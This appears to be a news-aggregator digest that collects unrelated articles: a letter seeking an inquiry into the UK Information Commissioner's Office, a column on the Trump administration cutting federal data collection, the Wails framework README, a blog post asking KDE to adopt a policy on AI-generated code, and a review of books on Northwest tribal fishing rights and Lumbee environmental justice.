A total of 73 academics, senior lawyers, data protection experts and organisations including Statewatch and the Good Law Project, have written a letter to Chi Onwurah, the chair of the cross-party Commons science, innovation and technology committee, coordinated by Open Rights Group, calling for an inquiry to be held into the office of the information commissioner, John Edwards.

“We are concerned about the collapse in enforcement activity by the Information Commissioner’s Office, which culminated in the decision to not formally investigate the Ministry of Defence (MoD) following the Afghan data breach,” the signatories state. They warn of “deeper structural failures” beyond that data breach.

The Afghan data breach was a particularly serious leak of information relating to individual Afghans who worked with British forces before the Taliban seized control of the country in August 2021. Those who discovered their names had been disclosed say it has put their lives at risk.

“Data breaches expose individuals to serious danger and are liable of disrupting government and business continuity,” the letter states. “However, in a recent public hearing hosted by your committee, Commissioner John Edwards has shown unwillingness to reconsider his approach to data protection enforcement, even in face of the most serious data breach that has ever occurred in the UK.”

The signatories cite other serious data breaches including those affecting victims of the Windrush scandal.

But they say the ICO has applied its “public sector approach” in these cases and either issued reprimands – written notices that lack the force of law – or significantly lowered the monetary penalties it awarded.

“The ICO decision not to pursue any formal action against the MoD despite their repeated failures was extraordinary, as was its failure to record its decision making. The picture that emerges is one where the ICO public sector approach lacks deterrence, and fails to drive the adoption of good data management across government and public bodies.”

“The handling of the Afghan data breach is not an isolated case; many are being let down by the ICO and its numerous failures to use corrective powers.”

The letter warns that alongside the shift away from enforcement in the public sector, statistics contained in the latest ICO report show that private sector enforcement is also becoming rarer as organisations are diverting resources away from compliance and responsible data practices, knowing that the ICO is not going to pursue the matter.

“Parliament has given the ICO considerable powers not to politely hope for the best, but to enforce compliance with legally binding orders. As we heard from the public hearing you hosted, the ICO chose not to use these powers to address the Afghan data breach.

“Unfortunately, the Afghan data breach is not an isolated incident, but the symptom of deeper structural failures which are emerging in the way the ICO operates.”

The letter concludes: “Change appears to be unlikely unless the Science, Innovation and Technology Committee uses their oversight powers and steps in.”

A spokesperson for the ICO said: “We have a range of regulatory powers and tools to choose from when responding to systemic issues in a given sector or industry.

“We respect the important role civil society plays in scrutinising our choices and will value the opportunity to discuss our approach during our next regular engagement. We also welcome our opportunities to account for our work when speaking to and appearing before the DSIT select committee.”

What OpenAI did when ChatGPT users lost touch with reality

Hacker News
www.nytimes.com
2025-11-24 05:58:08
Comments...
Original Article


Sunday Science: The Gravity Particle Should Exist. So Where Is It?

Portside
portside.org
2025-11-24 05:26:22
Sunday Science: The Gravity Particle Should Exist. So Where Is It? Ira Mon, 11/24/2025 - 00:26 ...
Original Article


Matthew John O'Dowd is an Australian astrophysicist. He is an associate professor in the Physics and Astronomy Department at the Lehman College of the City University of New York and the writer and host of PBS Space Time.

Space Time explores the outer reaches of space, the craziness of astrophysics, the possibilities of sci-fi, and anything else you can think of beyond Planet Earth with our astrophysicist host: Matthew O’Dowd.


Matt O'Dowd spends his time studying the universe, especially really far-away things like quasars, super-massive black holes, and evolving galaxies. He uses telescopes in space to do it. Matt completed his Ph.D. at NASA's Space Telescope Science Institute, followed by work at the University of Melbourne and Columbia University. He's now a professor at the City University of New York's Lehman College and an Associate at the American Museum of Natural History's Hayden Planetarium.

Previous host Gabe Perez-Giz is an astrophysicist who studies black hole physics. He received his Ph.D. from Columbia University and also hosted PBS Infinite Series.


Lambda Calculus – Animated Beta Reduction of Lambda Diagrams

Hacker News
cruzgodar.com
2025-11-24 05:17:15
Comments...

Trump’s One Weird Trick for Eliminating Bad News: Delete It

Portside
portside.org
2025-11-24 04:44:20
Trump’s One Weird Trick for Eliminating Bad News: Delete It Ira Sun, 11/23/2025 - 23:44 ...
Original Article

HOW DO YOU ERADICATE hunger, STDs, illiteracy, poverty?

It’s actually quite simple. You stop measuring them.

The government shutdown that just concluded left the country in something of a data blackout. Some major economic data releases have been delayed (like the September jobs report, which belatedly came out today ), and others canceled altogether (the October jobs report, which will never be released ). This has made it unusually difficult for U.S. businesses and the Federal Reserve to assess how well the economy is doing.

But if you assume the reopening of the government has put an end to these challenges, think again. The real threat to our understanding of the U.S. economy, and the country’s health writ large, is not that measly, six-week shutdown fight. It’s the fact that the Trump administration has been quietly snuffing out thousands of other data series, particularly those that might produce politically inconvenient results.

Take for example President Donald Trump’s boasts about bringing more international investment into the United States. 1 He extracted pledges from Switzerland and South Korea . Just this week, he boasted of a whopping $1 trillion in blood money from Saudi Arabian Crown Prince Mohammed bin Salman (as my colleague Andrew Egger notes , the Saudi investment jumped from $600 billion to $1 trillion in the course of a few minutes and would, if real, amount to an absurd chunk of the country’s GDP).

But fulfillment of such pledges is notoriously fickle; in the past, plenty of foreign companies and governments have promised big investments in U.S. factories and jobs that never materialized , generating bad headlines for the politicians who wrangled them. Fortunately for Trump, these pledges will become increasingly un-fact-checkable.

That’s because yesterday, to relatively little fanfare, the U.S. Bureau of Economic Analysis announced it was discontinuing some of its data collection on foreign investment in the United States as part of its “ongoing streamlining initiatives.” This follows previous announcements from the BEA in recent months about how it was paring back other data collection on foreign direct investment due to “ resource constraints .”

In the absence of data, I guess we’ll simply have to trust Trump when he says that he’s delivered.

Now, do I think Trump directed the BEA to eliminate these measures specifically to make it easier for him to bullshit about his dealmaking prowess? Not exactly. While there are some cases where the administration has leaned on statistical agencies or explicitly censored their findings , the more common and less visible tactic has been to just defund them .

Trump’s fiscal year 2026 budget request for the Bureau of Economic Analysis reflects a 20 percent reduction compared to last year, a target that agency staff have told me they’ve already hit thanks to DOGE cuts, early retirements, and hiring freezes. (The comms team at BEA—like most statistical agency press offices I’ve contacted in recent months—has declined to confirm or deny these numbers.) This has forced the BEA to make tough choices. The agency also is responsible for producing much higher-profile, market-moving data, such as the reports on GDP, consumer spending, and the Federal Reserve’s preferred measure of inflation. Something had to give, and this week, that something was data on foreign investment.

Other major statistical agencies are struggling with their own brain drains and funding cuts.

Take the Bureau of Labor Statistics, which releases data on the job market and prices, among other marquee measures. In August, Trump’s decision to fire Erika McEntarfer, the BLS commissioner, grabbed headlines, 2 but the top job is hardly the only hole this administration has blown in that agency. At the time of McEntarfer’s firing, a third of senior BLS leadership positions were already vacant . (That’s still the case , in fact.)

The rest of the agency has been swiss-cheesed too. Some regional field offices—such as the consumer price index offices in Buffalo, New York; Lincoln, Nebraska; and Provo, Utah—have been shuttered entirely . Meanwhile, post-COVID, the agency was already struggling with reduced survey-response rates, which have made its numbers noisier and more susceptible to big revisions. The administration’s response has been to disband the task force working to fix these problems.

The result is that federal data are being degraded—or deleted altogether. And deletion is especially common when statistical series measure issues that this administration would rather not track.

In September, for instance, the administration canceled a three-decade-old annual survey that measures how many Americans struggle to get enough food . A few months earlier, HHS eliminated the team that produces the poverty guidelines , which determine how we count the number of people in poverty and eligibility for benefits such as SNAP, Medicaid, Head Start, and childcare subsidies. But hey, if you never determine who’s eligible for benefits, maybe that means no one is.

Over the past ten months, I’ve been tracking similar cuts to federal data collection on substance abuse , natural disasters , children’s literacy , climate change , race , crime , immigration , gender identity and other issues. (My non-exhaustive, running list lives here ; please send me examples I may have missed.)

Lots of people might take these numbers for granted, but we’ll notice when they’re gone. We need these data to interpret the world around us and make decisions . Consumers use them to track the weather, determine where to send their kids to school, and negotiate raises. Businesses use them to hire, invest, price, and purchase. Doctors use them to diagnose illnesses. Public officials use them to craft policy. 3 And voters use them to determine whether their elected officials are keeping their promises.

But instead of recognizing the usefulness of these data—or perhaps because he recognizes it—the president has chosen to curate his own reality .

As was the case last week, when the White House cheerily announced that inflation had fallen because DoorDash’s breakfast offerings had gotten cheaper, and because Walmart had shrinkflationed its Thanksgiving dinner deal . Maybe this seemed forgivable when government agencies were shut down and everyone was looking for alternative measures to fill the statistical void. My fear is that the voids are multiplying.

1 Boosting foreign direct investment in the United States is a somewhat bizarre thing for Trump to fixate on, since higher FDI mathematically increases our trade deficits . Which Trump believes are already catastrophically high. But whatever, not like Trump has a Wharton degree.

3 “I would not want anyone to think the data have deteriorated to a point where it’s difficult for us to understand the economy,” Federal Reserve Chair Jerome Powell said in a June Senate hearing . “But the direction of travel is concerning.”


Catherine Rampell is economics editor at The Bulwark and an anchor at MS NOW (fmrly MSNBC). She specializes in econ, politics, public policy, immigration. Previously at WaPo, NYT, CNN, PBS NewsHour.


Build desktop applications using Go and Web Technologies

Hacker News
github.com
2025-11-24 04:33:57
Comments...
Original Article


Introduction

The traditional method of providing web interfaces to Go programs is via a built-in web server. Wails offers a different approach: it provides the ability to wrap both Go code and a web frontend into a single binary. Tools are provided to make this easy for you by handling project creation, compilation and bundling. All you have to do is get creative!

Features

  • Use standard Go for the backend
  • Use any frontend technology you are already familiar with to build your UI
  • Quickly create rich frontends for your Go programs using pre-built templates
  • Easily call Go methods from Javascript
  • Auto-generated Typescript definitions for your Go structs and methods
  • Native Dialogs & Menus
  • Native Dark / Light mode support
  • Supports modern translucency and "frosted window" effects
  • Unified eventing system between Go and Javascript
  • Powerful cli tool to quickly generate and build your projects
  • Multiplatform
  • Uses native rendering engines - no embedded browser !

Roadmap

The project roadmap may be found here . Please consult it before creating an enhancement request.

Getting Started

The installation instructions are on the official website .


FAQ

  • Is this an alternative to Electron?

    Depends on your requirements. It's designed to make it easy for Go programmers to make lightweight desktop applications or add a frontend to their existing applications. Wails does offer native elements such as menus and dialogs, so it could be considered a lightweight electron alternative.

  • Who is this project aimed at?

    Go programmers who want to bundle an HTML/JS/CSS frontend with their applications, without resorting to creating a server and opening a browser to view it.

  • What's with the name?

    When I saw WebView, I thought "What I really want is tooling around building a WebView app, a bit like Rails is to Ruby". So initially it was a play on words (Webview on Rails). It just so happened to also be a homophone of the English name for the Country I am from. So it stuck.

Stargazers over time

Star History Chart

Contributors

The contributors list is getting too big for the readme! All the amazing people who have contributed to this project have their own page here .

License

FOSSA Status

Inspiration

This project was mainly coded to the following albums:

Insurers retreat from AI cover as risk of multibillion-dollar claims mounts

Hacker News
www.ft.com
2025-11-24 04:22:12
Comments...
Original Article


With Love to KDE: Take a Moment

Lobsters
korcenji.neocities.org
2025-11-24 04:10:33
Comments...
Original Article

I've been using KDE Plasma for four and a half years. The community is sweet and the software is stellar, and I see a bright future for it. I want it to be the best it can be! So, I'd like to talk about a small incident that I want KDE to lean away from.

TL;DR: Please look at adopting an "AI" Policy similar to Servo's . Other projects' policies, like Asahi Linux's (they love KDE!) and Bevy's, may also be worth a look. Even Forgejo has its "AI" Agreement, though in my opinion it's a bit watered down.

Grzesiek11 writes: Do you seriously accept AI-generated code into KDE software? That’s concerning. Let’s even ignore ethical debates and code quality questions, models used for this are trained on a lot of proprietary code. We do not know whether this constitutes a derivative work. Proprietary projects like Windows obviously do not care about copyright (unless it’s theirs), but libre projects should hold themselves to a higher standard in my opinion, as we really do rely on the code being owned by the people who write patches.

Nate Graham responds: There’s an interesting parallel with KDE’s “real name” policy. In the past we were very firm about requiring one for contributions. But… how do we know the name someone picks is a real one? If it’s obviously fake like “uwu I’m a Kawaii Dragon” or “Max Mustermann”, then sure, we’ll know. But otherwise, it’s impossible. At a certain point we realized we were penalizing people for being honest about desiring anonymity and started accepting patches no matter the name. It’s a similar situation with AI, I think. There’s no way of knowing unless the use is obvious and not hidden — and at that point rejecting it would be be penalizing people for honesty.
A light exchange; or, the incident .

Before Nate made his response, I was also thinking about their old Real Name Policy. I thought it was kinda funny that KDE rejected pseudonyms for years for provenance reasons — and then felt they should accept LLM contributions even though a scraping LLM cannot ever have provenance.

Nate's reply then emulsifies these two positions. It seems his takeaway was not that pseudonyms have a negligible impact on provenance, but instead that provenance is impossible and so KDE should give up.

I find this odd? The logic doesn't sit well with me.

He's turned We can't know that someone's using a real name, so we must openly accept fake names.
Into We can't know that someone's not using an LLM, so we must openly accept LLM contributions.

But these statements don't evaluate the worth of pseudonyms or LLM code, and are instead purely defensive — "How practical is it to guarantee we avoid X ?" (Which for almost any given X , the answer is "We can't guarantee much at all". People can lie on the internet!)

My 2¢ is that there are other reasons to consider not accepting something. For instance, it would be bad to say,
We can't know that someone's not a nazi, so we must openly accept nazi contributions.

Excuse the invocation of Godwin's Law. Obviously, I don't believe this is a position KDE would hold. I'm just underscoring the need to actually think about whether having X in a project is good, and what ought to be done if we find instead that it's bad.

So, are LLM contributions bad?


LLM Contributions Are Bad

  • As mentioned, LLMs trained on scraped data cannot ever give complete attribution. It's how they work; it's the party trick of a black box. It's also non-consensual use, and it's plagiarism.
    • Occasionally, an LLM will regurgitate/resynthesize author credit. Sometimes these authors are not real, or are unrelated to whatever content is attributed to them. And unless the output is a 1:1 match for their work, it's incomplete credit and still plagiarism.
    • Hypothetically, one could train a language model to only use public domain or consensually granted data, such as code you've written yourself. But, these tend to give poor results.
  • LLMs bring downward pressure on code quality, lost productivity , and maintainer abuse. LLM contributions are often accompanied by an erroneous, nonsensical, or blathering description. The contributor also tends to have little-to-no understanding of the contribution and cannot personally answer questions from the review process. This is a waste of maintainer time and labour , is disrespectful, and can lead to burnout.
  • Scrapers are a scourge on the open web. So many FLOSS projects have been struggling with DDOS attacks, draining labor and money. Information sources are being diluted in a flood of spam. It's an extractive and corrosive force capitalizing on the digital commons.
  • There's the environmental impact. The KDE Eco project is probably displeased by the power usage of "AI" datacenters, and by the increased reliance on coal and natural gas plants to provide that power.
    • Hypothetically, a small local model could use less power than, say, playing a video game. But, these tend to give poor results.
  • And, importantly, LLMs are abetting fascism. These are scary times, and I like KDE because of its potential for being a reprieve from the power that tech wields over people. In contrast, "AI" normalization empowers what is increasingly clearly a tech oligarchy. "AI"'s greatest strength for fascism is the excuse; it's an excuse for thievery, bailouts, surveillance, discrimination, erosion of labor rights, and waving away responsibility. And that's to say nothing of its role in the disinformation machine.

I understand KDE has had some prior run-ins with "AI", such as Kdenlive's optional Whisper integration and a few in-progress chatbot clients. I'm not terribly fond of these, but right now I'd just like to see a plan for an "AI" contributions policy.

I'm not a decorated developer nor an expert on how not to feed into fascism, so please reach out to others to discuss. Reach out to the folks at Servo or Krita, or Bevy and Asahi Linux. Reach out to David Revoy. To Ed Zitron. To Andrew Roach. Anyone. See what people have already said , recap the ground we've already tread. Heck, I'm sure Brodie Robertson could talk about similar projects who've had to wrestle with an "AI" Policy.

Anyway, thanks for taking the time to read. This is important to me, and you'll find it's important to many. Take care and best wishes!

The Third Sovereign

Portside
portside.org
2025-11-24 03:55:54
The Third Sovereign Ira Sun, 11/23/2025 - 22:55 ...
Original Article

Reviewed:

Treaty Justice: The Northwest Tribes, the Boldt Decision, and the Recognition of Fishing Rights

by Charles Wilkinson

University of Washington Press, 353 pp., $34.95

On the Swamp: Fighting for Indigenous Environmental Justice

by Ryan E. Emanuel

University of North Carolina Press, 291 pp., $99.00; $22.95 (paper)

Billy Frank Jr. was fourteen when, in December 1945, he was fishing for salmon in the Nisqually River near Olympia, Washington, and state game wardens arrested him for the first time. Over the next twenty-five years he was arrested (and often jailed) more than four dozen times, despite his airtight defense: he fished under the terms of the Medicine Creek Treaty of 1854, one of ten treaties negotiated by Governor Isaac Stevens in which the US promised tribes in the Puget Sound area of the Pacific Northwest the right to fish where they’d always fished “in common with all citizens of the Territory.”

In 1965 the intensity of the arrests changed. Frank was fishing the Nisqually with his brother-in-law when armed wardens in a high-speed motorboat rammed Frank’s cedar canoe. “They got all kinds of training and riot gear—shields, helmets, everything,” Frank told Charles Wilkinson back in the 1970s, when Wilkinson was a young attorney with the Native American Rights Fund. “These guys had a budget. This was a war.”

In the mid-1960s Frank was one of several young activists in the Pacific Northwest who had begun staging “fish-ins,” acts of protest inspired by Black civil rights sit-ins but, a participant wrote, “done in a distinctive Indian way.” Native activists, with their families and allies, fished at riverside encampments, pressing their own fishing rights against state fishing prohibitions, resulting in arrests and news coverage and increasing brutality on the part of the state. The violence peaked in the summer of 1970, when state and local police raided an encampment on the Puyallup River in Tacoma, using rifles, tear gas, and batons to arrest dozens of men, women, and children.

One of the bystanders gassed during the melee was Stan Pitkin, the US attorney for western Washington who, days later, filed a complaint, United States v. Washington , on behalf of tribes that had signed the so-called Stevens treaties. The four-year trial resulted in a resounding victory for tribal sovereignty in the United States, reasserting the tribes’ fishing rights under the treaties and affirming those treaties as living documents—a verdict known today as the Boldt decision, named for its author, Judge George Boldt.

Frank served as the chairman of the Northwest Indian Fisheries Commission, the organization established by the 1974 ruling to aid the tribes in managing fisheries—a post he held for more than thirty years. In 2013 he asked Wilkinson, his old friend, by then an expert in federal Indian law, to write a book about the case. Wilkinson died in 2023, but the book he completed, Treaty Justice , deftly lays out one of the twentieth century’s most significant and underestimated legal decisions. “Judge George Boldt’s ruling…is a landmark in the American civil rights movement,” Wilkinson writes. “It belongs in the same company as Brown v. Board of Education and a select few other court cases in terms of bringing justice to dispossessed peoples.”

The trial began with a question: What were the circumstances under which these Pacific Northwest tribal nations signed the treaties negotiated by Isaac Stevens? A Massachusetts-born army engineer, Mexican-American War veteran, and railroad surveyor, Stevens was appointed governor of the newly established Washington Territory by his fellow veteran President Franklin Pierce in 1853. US expansion had slowed while Congress debated slavery’s future in the new territories, though Pierce still coveted Alaska, Hawaii, and Cuba and was eager to quickly solidify possession of what would become Washington, Idaho, and part of Montana. In the Northwest, the Donation Land Act of 1850 and its companion legislation, the Oregon Indian Treaty Act, called for the territorial commissioners to extinguish Native claims—declaring them null and void for the sake of white settlement—a task Stevens took on with alacrity.

The tribal cultures and economies Stevens encountered in the Puget Sound area were as varied as the region’s ecology. Around what are today called the San Juan Islands, the Lummi set reef nets in kelp beds to catch salmon in the northern sound’s open waters. To the south, the Nisqually fished the rivers and managed the prairies, burning forest to encourage grazing habitat for deer and elk. On the Olympic Peninsula, the Quinault caught salmon in their glacial rivers while harvesting shellfish along the Pacific coast, and on the peninsula’s northwestern tip, the Makah, whose warriors had repelled British sailors a century earlier, also caught salmon in their tidal rivers but focused on halibut and famously whales.

From 1820 to 1840, Wilkinson explains in Treaty Justice , the tribes had managed to coexist peacefully with British traders. But as the late Nisqually historian Cecelia Svinth Carpenter noted in Stolen Lands: The Story of the Dispossessed Nisquallies (2007), “The peacefulness of the scene fast disappeared when American families started arriving and building fences around choice Nisqually land.”

Stevens’s initial plan was to move all the tribes to a single reservation, an idea they quickly rejected. George Gibbs, a Harvard-educated ethnographer, suggested that tribal leaders would consider multiple reservations if guaranteed

the right of taking fish, at all usual and accustomed grounds and stations…, and of erecting temporary houses for the purpose of curing, together with the privilege of hunting, gathering roots and berries, and pasturing their horses on open and unclaimed lands.

The “final settlement,” as Stevens called it, was conducted in Chinook Jargon, a Pacific coast trade language of an estimated five hundred words, the effective use of which, a scholar noted, “depends on the ingenuity and imagination of the speaker.” Translating was Frank Shaw, a settler who, Wilkinson writes, “had only a moderate grasp of the Chinook Jargon and knew no Indigenous languages.”

Treaties were viewed by the US as a “temporary expedient,” in the words of the historian Alexandra Harmon, and in 1887 the General Allotment Act designated vast amounts of tribal land “surplus” based on the assumption that increasingly Americanized tribes would give up hunting and fishing communal lands for cultivating small private farms. Henry Dawes, the Massachusetts senator who wrote the act, saw collective ownership as Native America’s fatal flaw: “There is no selfishness, which is at the bottom of civilization.” Over the next half-century an estimated 90 million acres of Native land were taken by the US.

The effect of the Stevens treaties, for tribes in the Puget Sound area as elsewhere, was what Wilkinson calls “the long suppression.” “Native fishing rights, so central to tribal existence,” he explains, “were denied or scraped to the bone.” For decades private canneries and even dams decimated salmon runs, while US Indian agents forbade indigenous practices and sent Native children off to English-only Christian schools.

Then in 1953 the US adopted a new policy of “termination,” moving to end federal responsibilities to the tribes entirely, regardless of treaties. Within twenty years Congress terminated the recognition of 109 tribes in Oregon, California, Wisconsin, and elsewhere, affecting more than 11,000 Native people and taking upward of 1.3 million acres of land. No tribes were terminated in Washington state, but as salmon dwindled, commercial and sports fishermen focused state enforcement on tribal fishers—despite the fact that when Billy Frank’s canoe was rammed on the Nisqually by wardens in a speedboat, the tribes were taking only 6 percent of the total Puget Sound harvest.

In the 1950s and 1960s a confluence of events revitalized Indian country. Native American veterans returned from World War II and the Korean War and attended college; tribes took control of programs formerly administered by the Department of the Interior’s Bureau of Indian Affairs, in schools, hospitals, and resource management.

In the Puget Sound area, leaders of the Muckleshoot, Puyallup, and Nisqually Nations began to meet with attorneys about their fishing rights. In 1963 Makah leaders interviewed Al Ziontz, a Seattle lawyer, who said, “If I were representing the Makah Tribe, the principle of tribal sovereignty would be the way I would go about defending your rights.” Ziontz knew little about Indian law—no law school taught it, despite tribes being, after the federal and state governments, the third of the three sovereign powers in the US constitutional system. Sovereignty made the tribes, as Chief Justice John Marshall wrote in 1832, “distinct political communities, having territorial boundaries, within which their authority is exclusive.”

What happened next was a powerful mix of scholarship and organizing, with lawyers and activists tag-teaming to move the tribes toward a confrontation with the state. Hank Adams, an Assiniboine and Sioux activist who grew up on the Quinault Reservation—Wilkinson calls him “razor-sharp brilliant and driven”—set up at Frank’s Landing, a riverside encampment named for Billy Frank’s father, where, with Janet McCloud (Tulalip) and Ramona Bennett (Puyallup), he organized the Survival of the American Indian Association. Starting in 1964 the group turned fishing arrests into civil rights actions.

In the group’s first years celebrities (including Marlon Brando and Dick Gregory) were arrested at protests, as Adams organized support from Friends groups, Black Panthers, and the Southern Christian Leadership Conference. A planned five-day action at Frank’s Landing in 1968 lasted for months; in addition to eating the salmon they caught, the activists sold some to fund the encampment. By the time the police raided the Puyallup fish-in, in 1970, the young radicals were supported by the Puyallup tribal council, which sent a police force to protect the activists, who were fired on at random by vigilantes. On the day of the raid, Ramona Bennett said to game wardens approaching in a boat, “Touch our net and we’ll shoot you!”

In suing the State of Washington, Stan Pitkin, the Nixon-appointed US attorney, was working for what he called “a case to end all cases.” The time seemed right; two months before, Nixon had issued his special message to Congress on Indian affairs, which called for tribal “self-determination” and declared the termination policy “morally and legally unacceptable.” (Nixon, who advocated for land returns to tribes, counted his football coach at Whittier College, Wallace Newman, a Luiseño tribal citizen, as a mentor, but the president was likely also responding to Red Power actions, like the occupation of Alcatraz in 1969.) Judge Boldt was a bow-tie-wearing conservative who, just before the trial, had jailed Vietnam War protesters, making the tribes’ legal team nervous. But as the weeks passed, tribal attorneys sensed Boldt’s attentiveness and were relieved to spot Vine Deloria Jr.’s 1969 best seller, Custer Died for Your Sins: An Indian Manifesto , in his chambers.

For the first year of the trial, Judge Boldt took testimony on the treaties’ historical background. The State of Washington’s attorneys claimed that in 1854 the tribes were in “rapid cultural decline,” and they argued that the fishing rights defined by the Stevens treaties were moot. The plaintiffs’ expert—Barbara Lane, a Canadian anthropologist who had previously worked with numerous Northwest tribes—described a vibrant, adaptive culture, past and present. “They were not declining into nothing,” she said. Lane showed how the tribes had not only adapted to the new settlers but offered them ways to survive, with new kinds of food, shelter, and clothing. North of the Strait of Juan de Fuca, the British settlers in Victoria burned whale oil purchased from the Makah.

Next, twenty-nine tribal members testified to show that ancient cultural practices were also contemporary. Witnesses spoke in their own languages and recounted decades of abuse by Indian agents while displaying a generational fortitude that, trial participants noticed, captivated Boldt. There was also humor, another survival trait. Asked whether off-reservation fishing of winter chum salmon was prohibited by the state, Billy Frank said, “Well, I have been in jail enough times to say it probably is.”

As the trial progressed, a new facet of the case emerged: “the ambition,” Wilkinson writes, “of tribes to regulate their own members and to engage in salmon management.” Boldt’s ruling could add tribal oversight to federal and state oversight, and he now worked to decide whether the tribes could manage their own fisheries. The great revelation for nontribal citizens was that the tribes not only could but often already did so better than the region’s newcomers. In addition to a young Quinault fisheries expert finishing up his Ph.D., Boldt heard from Horton Capoeman, sixty-eight, who was bilingual and had lived on the Quinault Nation’s reservation his entire life, save for his US Army service. He had served on the tribal council, on the business committee, and as a tribal judge; his testimony detailed how the tribe had for generations managed Native and non-Native fishers when they either poached or overfished, by regulating timing or restricting access, depending on the offense. As Capoeman’s grandfather had told him, “It had to be done in order to bring them back to their senses.”

Boldt’s meticulousness, combined with a temporary assignment in Washington, D.C., meant that the trial stretched on, but at last on February 12, 1974—Lincoln’s birthday, a date Boldt chose to reflect what he saw as the decision’s significance—he upheld the tribes’ treaty rights and reinforced their status as sovereign entities. In straightforward, unsentimental language, he described the tribes’ “paramount dependence upon the products of an aquatic economy, especially anadromous fish, to sustain the Indian way of life.”

The decision was celebrated throughout Indian country. “In the 1960s there was a general belief in the public that treaties were ancient history, not the supreme law of the land,” said John Echohawk, the executive director of the Native American Rights Fund. “Our wish became true…. The treaties were acknowledged as the law. The Boldt Decision was the first big win for the modern tribal sovereignty movement.” A state official, meanwhile, compared the decision to a dictatorship. Bumper stickers read “Can Judge Boldt—not salmon.” Boldt, white Washingtonians argued, had made the majority population “second-class citizens,” denied equal rights.

A federal appeals court upheld the decision in 1975, but the Supreme Court declined to hear it for five years, a silence that exacerbated state officials’ anger and resulted in a salmon fishing free-for-all. Puget Sound was filled with white poachers ramming Indian boats, cutting nets, and slashing car tires (as they still do). At last the Supreme Court upheld the decision on July 2, 1979, quoting Boldt’s opinion repeatedly, as well as a 1905 case, United States v. Winans , which described the right to take salmon as “not much less necessary to the existence of the Indians than the atmosphere they breathed.” Washington state legislators were reprimanded. “Except for some desegregation cases,” the decision read, “the district court has faced the most concerted official and private efforts to frustrate a decree of a federal court witnessed in this century.”

In the years of the Pacific Northwest fish-ins, Sam Ervin, the North Carolina congressman who led the Watergate hearings, had a reputation for fighting against civil rights legislation, though he nevertheless sponsored the Indian Civil Rights Act of 1968. Unbeknownst to many Americans, North Carolina is home to the largest population of Native Americans east of the Mississippi—a population that included Ervin’s staffer Helen Maynor Scheirbeck, a Lumbee from Robeson County. Scheirbeck also helped pass the 1972 Indian Education Act. Thanks to that law, in the late 1970s a Lumbee educator was brought into the North Carolina elementary school attended by Ryan E. Emanuel, whose book, On the Swamp: Fighting for Indigenous Environmental Justice , looks at the survival of indigenous communities along the southern coastal plain.

Emanuel is a hydrologist and a professor at Duke. He grew up in Charlotte, a city in the soft hills of North Carolina’s Piedmont region, spending summers “on the swamp”—the traditional Lumbee territory. “The place we come from is the crazy quilt of blackwater streams, floodplain forests, and sandy uplands that all drain to the Lumbee River,” Emanuel writes.

To be “on the swamp” means to be around Prospect, Saddletree, Burnt Swamp, Sandy Plains, Back Swamp, or one of the myriad other Lumbee communities arrayed across the Lumbee River basin.

The area is characterized by low-lying, hemlock-covered microclimates that are remnants of the just-glaciated past, what paleoecologists refer to as refugia.

By the time Isaac Stevens set out to extinguish Native rights in the Pacific Northwest, tribes in the Southeast (including the Cherokee, Chickasaw, and Choctaw) either had already been forcibly removed to what would become Oklahoma or were negotiating recognition in a society that acknowledged them reluctantly, if at all. Early encounters with settlers in the Southeast had destroyed communities with war and disease, but the Lumbee found a form of protection in the isolated swamps, their own refugia. “To settlers,” Emanuel writes, “they were unmapped places, interstitial lands. But to us, these places were home—backwaters amid swirling currents of colonialism.”

In On the Swamp , Emanuel uses his scientific training to gauge his homeland’s inscrutability to white settlers. In 2019 he compared nearly a hundred maps of the coastal plain created between the 1500s and the early 1900s and discovered that, prior to 1800, colonial mapmakers “generally did a poor job of representing the topology of the Lumbee River.” To miss the river’s “twisting, wandering channel” was to miss the “network of connected places” that makes up the Lumbee community—but it was this obscurity that afforded the Lumbee protection and, with an abundance of food and a strategic distance, strength. It was from a base in a Lumbee swamp that Henry Berry Lowry, a biracial freedom fighter and Lumbee hero, raided the Confederates during and after the Civil War, managing to avoid a sheriff’s hundred-man posse in 1871.

In the twentieth century, attacks came from railroad corporations, logging companies, and developers involved in wetland drainage projects that saw the luxuriously rich ecology of the swamps as merely, a local judge said in 1939, “noisome odors and unwholesome fogs.” Then in the 1950s natural gas came to Robeson County, and the land was suddenly valuable in another way—as an easement. “When Indigenous people today say that fossil fuel projects plow through their lands without regard for the well-being of communities and cultural landscapes, they are not exaggerating,” Emanuel writes. “They are speaking from generations of lived experience.”

Prospect, a town in Robeson County made up almost entirely of Native people, became a gas hub along the Transcontinental Pipeline, or TRANSCO, then the world’s longest gas pipeline, running from Texas to New York. Another hub was established near the historic site of Fort Nooheroka, where in 1713 a white militia had burned to death hundreds of Tuscarora people and enslaved hundreds more. (Many of the remaining Tuscarora soon relocated, joining the Haudenosaunee Confederacy in New York state.) These areas now include streams overwhelmed with animal waste from swine and poultry farms, and, Emanuel notes, “an ever-expanding tangle of gas pipelines and related infrastructure.”

But the Federal Energy Regulatory Commission (FERC) never asked the Lumbee for permission to run pipelines through their land. In 1956, two years before the digging began, Congress passed the Lumbee Act, which recognized the tribe as a sovereign entity. But termination was US Indian policy at the time, and a last-minute clause was added at the Bureau of Indian Affairs’ request, rendering the Lumbee legally invisible:

Nothing in this Act shall make such Indians eligible for any services performed by the United States for Indians because of their status as Indians, and none of the statutes of the United States which affect Indians because of their status as Indians shall be applicable to the Lumbee Indians.

This has caused real-life complications. In 2014, when a consortium of energy companies proposed a six-hundred-mile-long pipeline that would run from West Virginia to Robeson County, the chairman of the Lumbee Nation requested consultation, citing the Lumbee Act. The federal regulators sidestepped the tribe, citing the Lumbee Act, and in 2016 FERC concluded that “environmental justice populations would not be disproportionately affected” by the pipeline.

In 2017 Emanuel published a report in Science analyzing the route of the pipeline and showing how developers planned to clear-cut the swamp forests where the pipeline crossed water. Digging into the datasets buried in FERC’s appendixes, he also showed that while the Lumbee and other Native Americans made up just 1 percent of the population in the regions of West Virginia, Virginia, and North Carolina that the line would run through, they made up 5 percent of the people directly affected by its route. The pipeline was canceled in 2020, but had it been built, one in four Native Americans in North Carolina, or 30,000 people, would have lived along it—a population larger than that threatened by the Dakota Access Pipeline at Standing Rock.

